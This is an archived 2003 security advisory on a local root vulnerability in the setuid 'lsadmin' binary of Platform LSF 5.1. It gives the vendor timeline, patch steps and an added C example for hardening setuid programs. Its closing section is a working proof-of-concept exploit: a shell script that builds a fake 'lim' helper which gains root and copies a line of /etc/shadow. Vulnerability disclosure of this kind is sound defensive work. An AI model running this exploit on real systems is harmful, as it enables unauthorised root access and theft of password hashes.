Security advisory: LSF 5.1 local root exploit

2003-05-22T00:00:00
ID SECURITYVULNS:DOC:4562
Type securityvulns
Reporter Securityvulns
Modified 2003-05-22T00:00:00

Description

                 Security Advisory

                    22 May 2003

               Local root in LSF 5.1

Name: Load Sharing Facility version 5.1
Severity: High
Vendor URL: http://www.platform.com
Author: Tomasz Grabowski (cadence@aci.com.pl)
Vendor notified: 25 Feb 2003
Vendor response: 25 Feb 2003
Vendor fix: 19 Mar 2003

Commercial: I'm looking for a new job

Impact: A local attacker can gain root privileges by forcing the 'lsadmin' binary to execute code of the attacker's choice. The 'lsadmin' binary is setuid root.

Description:

The 'lsadmin' binary has a "ckconfig" command, which checks the correctness of the configuration files. Right after it starts, ckconfig runs the external 'lim' binary, locating it through the LSF_SERVERDIR variable in the lsf.conf file. A regular user can create their own lsf.conf and, by setting the LSF_ENVDIR environment variable, force 'lsadmin' to read it instead of the default /etc/lsf.conf. The attacker can therefore point LSF_SERVERDIR at a 'lim' binary of their own, which 'lsadmin' then executes with its setuid root privileges.
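The defensive pattern for this class of bug, as an added example that is not Platform's code: a setuid program must not let the caller's environment (LSF_ENVDIR) choose its configuration file, and must verify that the directory it reads from that configuration (LSF_SERVERDIR) is root-owned and not writable by others before executing a helper such as 'lim' from it. The function names, and the sample directories /usr/bin and /tmp used in main(), are constructed for illustration.

```c
/* Added example (not Platform's code): hardening a setuid program against the
 * LSF_ENVDIR / LSF_SERVERDIR trust problem described above. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
#define DEFAULT_CONF "/etc/lsf.conf"   /* compiled-in default named in the advisory */

/* True when effective ids differ from real ids: the binary runs setuid/setgid
 * and the caller's environment must be treated as attacker controlled. */
int running_setuid(void) {
    return getuid() != geteuid() || getgid() != getegid();
}

/* Choose the lsf.conf to read. With privileges, LSF_ENVDIR is ignored and the
 * built-in path wins; without them, a relative LSF_ENVDIR is also rejected. */
const char *config_path(int privileged, char *buf, size_t len) {
    const char *envdir = getenv("LSF_ENVDIR");
    if (privileged || envdir == NULL || envdir[0] != '/')
        return DEFAULT_CONF;
    snprintf(buf, len, "%s/lsf.conf", envdir);
    return buf;
}

/* A directory may supply root-executed helpers only if it is absolute, not a
 * symlink, really a directory, owned by root and not group/world writable. */
int trusted_dir_ok(const char *dir) {
    struct stat st;
    if (dir == NULL || dir[0] != '/' || lstat(dir, &st) != 0) return 0;
    if (!S_ISDIR(st.st_mode) || st.st_uid != 0) return 0;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Build "<serverdir>/<name>" for a helper such as lim; -1 if the directory is
 * untrusted, the name contains a slash, or the result would be truncated. */
int helper_path(const char *serverdir, const char *name, char *buf, size_t len) {
    if (!trusted_dir_ok(serverdir) || strchr(name, '/') != NULL) return -1;
    int n = snprintf(buf, len, "%s/%s", serverdir, name);
    return (n < 0 || (size_t)n >= len) ? -1 : 0;
}
int main(void) {
    char conf[4096], lim[4096];
    printf("config file: %s\n", config_path(running_setuid(), conf, sizeof conf));
    /* constructed sample: /tmp is world-writable, so no helper is taken from it */
    printf("lim from /tmp allowed: %d\n", helper_path("/tmp", "lim", lim, sizeof lim) == 0);
    return 0;
}
```

On glibc, secure_getenv() performs the running_setuid() check internally and returns NULL for a setuid process, so it can replace the getenv() call in config_path().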

How to patch:

1) Download the lsadmin patch from Platform ftp site

ftp ftp.platform.com
location: /patches/5.1/patch/sup_by_dev33993/
file: lsadmin5.1_<os>.Z

If you do not have username/password to access ftp.platform.com, contact support@platform.com

2) In LSF_BINDIR, move the old lsadmin to lsadmin.old. Uncompress the downloaded binary and rename it to lsadmin. Move the new lsadmin into LSF_BINDIR. Make sure its permissions are 4755.

For more information on patch or related questions, contact support@platform.com

Exploit:

LSF 5.1 'lsadmin' local root exploit

2003.03.20 - CADENCE of Lam3rZ

Proof of concept - for educational purposes only!

cat <<END > attacker_code.c
#include <stdio.h>
#include <unistd.h>

int main()
{
    FILE *secret_file;
    FILE *temp_file;
    char one_line[128];

    setuid(0); setgid(0);
    secret_file = fopen("/etc/shadow", "r");
    temp_file = fopen(".temp.file", "w");
    fgets(one_line, 120, secret_file);
    fputs(one_line, temp_file);
    fclose(secret_file);
    fclose(temp_file);
    return 0;
}
END

gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file


Tomasz Grabowski
(0-91)4494234
Akademickie Centrum Informatyki
mailto:cadence@man.szczecin.pl